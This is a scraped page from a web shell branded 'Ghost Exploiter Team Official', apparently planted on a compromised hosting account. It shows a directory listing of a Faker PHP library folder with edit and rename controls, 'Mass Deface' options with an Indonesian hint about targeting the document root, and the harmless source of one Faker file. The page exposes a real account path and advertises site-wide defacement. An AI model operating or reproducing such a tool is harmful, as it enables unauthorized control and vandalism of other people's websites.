webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
fakerphp
/
faker
/
src
/
Faker
/
Provider
/
de_AT
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Address.php
10.81KB
edt
ren
Company.php
0.306KB
edt
ren
Internet.php
0.256KB
edt
ren
Payment.php
1.279KB
edt
ren
Person.php
11.132KB
edt
ren
PhoneNumber.php
0.444KB
edt
ren
Text.php
0.088KB
edt
ren
<?php namespace Faker\Provider\de_AT; class Company extends \Faker\Provider\Company { protected static $formats = [ '{{lastName}} {{companySuffix}}', '{{lastName}}', ]; protected static $companySuffix = ['AG', 'EWIV', 'Ges.m.b.H.', 'GmbH', 'KEG', 'KG', 'OEG', 'OG', 'OHG', 'SE']; }